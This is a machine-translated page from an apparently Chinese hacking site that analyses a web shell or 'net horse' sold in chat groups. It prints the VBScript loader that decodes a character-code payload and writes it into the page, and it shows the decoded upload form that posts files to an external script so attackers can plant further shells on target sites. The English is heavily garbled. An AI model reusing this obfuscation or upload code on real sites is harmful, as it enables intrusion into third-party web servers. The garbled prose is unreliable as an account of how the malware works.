You are here: hacking technology > encryption decipher > Content
Hot Articles
Recommend Articles
New Articles
And uses to some ASC detail network horse's explaining
  Add date: 07/09/2008   Publishing date: 07/09/2008   Hits: 45
Total 2 pages, Current page:1, Jump to page:
 
In the QQ group, some people are hawking the net horse. The net friend spends obtains a sharing to give me, lets me have a look. Therefore had the following this article.
  1. net Ma Chutan

  Opens the net horse in the browser, this net horse's function is quite simple, mainly uses for to upload the function stronger network horse. What compared with has the characteristic is may in the goal homepage upload crack, oneself revise the disposition. Examined that this net horse's source code, discovered this net horse has encrypted, is very obviously encrypts with ASC. (Figure 1)



  2. net horse analysis

  Although this net horse's core function code carried on ASC to encrypt, but its frame was clear. Its code and the explanation are as follows:

<script language=vbscript>
'may see this net horse is a VB script
function rechange(k)
'has defined a rechange function, this function has defined variable k
s=Split (k, “,”)
'the split function is k by “,” separates, its definition is an array
t= ""
Bestows on the spatial value to t;
For i = 0 To UBound(s)
t=t+Chrw(eval(s(i)))
Carries on the circulation with for to transform, transforms the t value into the character, accumulates in turn. UBound is the array dimension, Chrw is the character conversion function.
Next
rechange=t
Returns to the function t
End Function
t= " 60,33,68,79,67,84,89,80,69,32,104,116,109,108,32,80,85,66,76,73,67,32,34,45,47,47,87,51,67,47,47,68,84,68,32,88,72,84,77,76,32,49,46,48,32,84,114,97,110,115,105,116,105,111,110,97,108,47, ...... “
'middle abbreviates N to be many, this is the net horse's function code
document.write rechange(t)
'outputs the function value in the browser
</script>  


  3. net horse decipher

  Might compile a ASC decipher tool voluntarily, the author from-line has downloaded others' ASC decipher code, then acted according to this net horse's encryption principle to make the revision to translate the production decipher tool.

  Moves this tool, clicks on the decipher this net horse source code t following value copy to the tool corresponding text frame, then returns to original state this net horse's source code. (Figure 2)



<body>
<form action= http://www.51iccard.com/upfile_other.asp method=post name=form1 onsubmit=return
click() enctype=multipart/form-data>
<p align= " center " ><span class= " STYLE4 " > source (</span><span class= " STYLE3 " > picture </span><span class= " STYLE4 " >) document:
  </span>
<input name= " filename " type= " file " class= " buttonUnActive " size= " 20 " >
<span class= " STYLE4 " >
 Goal (</span><span class= " STYLE3 " > Malaysian </span><span class= " STYLE4 " >) document:
  </span>
 <input name= " filename1 " type=file class=buttonUnActive size=20></p>

 
Other pages: : 1 * 2 * Next>>
Prev:The specification explains in technical the violence to explain the principle Next:Teaches you to use IAT hook to realize the windows universal code back door

Comment:

Category: Home > encryption decipher